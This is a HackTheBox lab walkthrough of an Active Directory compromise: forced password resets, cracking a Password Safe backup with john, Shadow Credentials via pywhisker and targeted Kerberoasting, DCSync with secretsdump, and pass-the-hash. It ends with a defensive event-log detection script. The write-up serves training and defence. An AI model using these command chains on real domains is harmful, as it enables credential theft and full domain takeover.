Administrator on HackTheBox

Before all

Victim’s IP : 10.10.11.42
Victim’s Host : administrator.htb
Attacker’s IP : 10.10.14.10

Initial Credential: Olivia/ichliebedich

Yep… I didn't notice that at the time and spent almost an hour brute-forcing 🫠

Recon

The usual routine.
If you're not familiar with these tools, just google how to use them~

port scan

Command

rustscan -a 10.10.11.42 --ulimit 5000 -- -sC -sV -Pn

Result

PORT      STATE SERVICE       REASON  VERSION
21/tcp open ftp syn-ack Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-12-07 08:08:50Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
53462/tcp open msrpc syn-ack Microsoft Windows RPC
56475/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
56486/tcp open msrpc syn-ack Microsoft Windows RPC
56491/tcp open msrpc syn-ack Microsoft Windows RPC
56494/tcp open msrpc syn-ack Microsoft Windows RPC
56513/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-12-07T08:09:52
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35406/tcp): CLEAN (Couldn't connect)
| Check 2 (port 20079/tcp): CLEAN (Couldn't connect)
| Check 3 (port 52617/udp): CLEAN (Failed to receive data)
| Check 4 (port 20759/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 7h00m06s

FTP, SMB, LDAP, Windows RPC and Microsoft HTTPAPI are open.
At first glance none of the version numbers look interesting.

bloodhound

Command

bloodhound-python -c All -u 'Olivia' -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42 --zip

Then run neo4j start and bloodhound, and drag the zip in to look at it.

Exploit

All logins are done with evil-winrm.

evil-winrm -u 'Olivia' -p 'ichliebedich' -i 10.10.11.42

Abusing password reset

We currently have Olivia's privileges, so first look at her Outbound Object Control.

Because these accounts have control rights over each other, there is a reset-password path:
Olivia -> Michael (via GenericAll)

net user michael Whale120

The password is now Whale120.
Next is Michael -> Benjamin (via ForceChangePassword).
Because Benjamin can't log in over WinRM or similar interfaces, the password can only be changed via RPC.
Command reference: https://malicious.link/posts/2017/reset-ad-user-password-with-linux/

rpcclient -U michael //10.10.11.42

Once inside:

setuserinfo benjamin 23 'Whale120'

And then I almost got stuck.

Cracking pwsafe file

Remember the FTP service from the scan? This is where it's used.
Command

ftp administrator.htb

The credentials are benjamin/Whale120.
ls shows only one file; get Backup.psafe3 downloads it.
After checking it with file and searching for a tool, I found one called pwsafe; grab it with apt~
It wants a password QwQ, so let's introduce it to john 😎

pwsafe2john Backup.psafe3>hash
john hash --wordlist=/home/kali/rockyou.txt


Select a user and click Auto Type,
and that gives you the password.

Shadow Credential

First focus on Emily's privileges:

She has GenericWrite on Ethan.
The so-called msDS-KeyCredentialLink holds the keys for that user's various authentication methods on Windows (not only passwords, but also fingerprint, PIN, etc.), and the encryption uses the target's NTLM hash.
In other words, if you can write to the target's msDS-KeyCredentialLink and obtain the returned value, you can get the hash and try to crack it; this technique is called Shadow Credentials.
pywhisker
pywhisker can create a new key:

pywhisker -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --target ethan --action "add"


targetedKerberoast.py
Next, use targetedKerberoast.py to grab the SPN just created:

sudo ./targetedKerberoast.py -v -d 'administrator.htb' -u emily -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Finally, throw it at john as before to crack it.

P.S.
If you hit a KRB_AP_ERR_SKEW (Clock skew too great) error, your clock isn't in sync; align it with the host's time:

sudo su
timedatectl set-ntp off
rdate -n 10.10.11.42

I haven't run into any other problems (so far).

DCSync and Pass The Hash

Ethan has DCSync on Administrator.

For details, see: https://tttang.com/archive/1634/

Fire off impacket-secretsdump~

impacket-secretsdump -just-dc [email protected]


Finally, Pass The Hash against Administrator:

evil-winrm -u Administrator -H '3dc553ce4b9fd20bd016e098d2d2fd2e' -i 10.10.11.42
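
Added example (not from the original writeup): a small Python triage script showing what this whole chain leaves in the Security log for a defender, covering the password resets (event 4724), the msDS-KeyCredentialLink write from the Shadow Credential section (event 5136) and the replication rights exercised by DCSync (event 4662). It runs over constructed JSON-per-line samples; the field names are a simplified assumption, not the exact Windows event XML.

```python
import json

# Well-known extended-rights GUIDs a DCSync must exercise on the domain object.
DCSYNC_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}

def classify(event):
    """Return an alert string for one Security event dict, or None if benign."""
    eid = event["EventID"]
    actor = event["SubjectUserName"].lower()
    if eid == 4724:
        # 4724 = password reset by another principal (self-change is 4723).
        return f"password reset by {actor} on {event['TargetUserName']}"
    if eid == 5136 and event.get("AttributeLDAPDisplayName", "").lower() == "msds-keycredentiallink":
        # Write to msDS-KeyCredentialLink: the Shadow Credentials primitive.
        return f"KeyCredentialLink write by {actor} on {event['ObjectDN']}"
    if eid == 4662 and not actor.endswith("$") and DCSYNC_RIGHTS & set(event.get("Properties", [])):
        # Replication rights used by a non-machine account: DCSync pattern.
        return f"DCSync-style replication by {actor}"
    return None

def scan(lines):
    """Parse JSON-per-line events and return the alerts in log order."""
    alerts = []
    for line in lines:
        if line.strip():
            hit = classify(json.loads(line))
            if hit:
                alerts.append(hit)
    return alerts

# Constructed sample events (simplified fields), mirroring this box's path.
SAMPLE_LOG = """
{"EventID": 4724, "SubjectUserName": "olivia", "TargetUserName": "michael"}
{"EventID": 4723, "SubjectUserName": "benjamin", "TargetUserName": "benjamin"}
{"EventID": 5136, "SubjectUserName": "emily", "ObjectDN": "CN=Ethan,CN=Users,DC=administrator,DC=htb", "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"}
{"EventID": 5136, "SubjectUserName": "emily", "ObjectDN": "CN=Ethan,CN=Users,DC=administrator,DC=htb", "AttributeLDAPDisplayName": "description"}
{"EventID": 4662, "SubjectUserName": "DC$", "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]}
{"EventID": 4662, "SubjectUserName": "ethan", "Properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]}
""".strip().splitlines()

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```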


ROOTED!

After all

It's been a while since I did this much AD, and I noticed some concepts/terms have gotten rusty :zzz:
Definitely not on the road to becoming a script kiddie.
This article helped fill the gaps XD
https://xz.aliyun.com/t/15718?time__1311=GqjxnQiQEpDsD7Co0%3DGOjG8YF3xYT2ymD#toc-10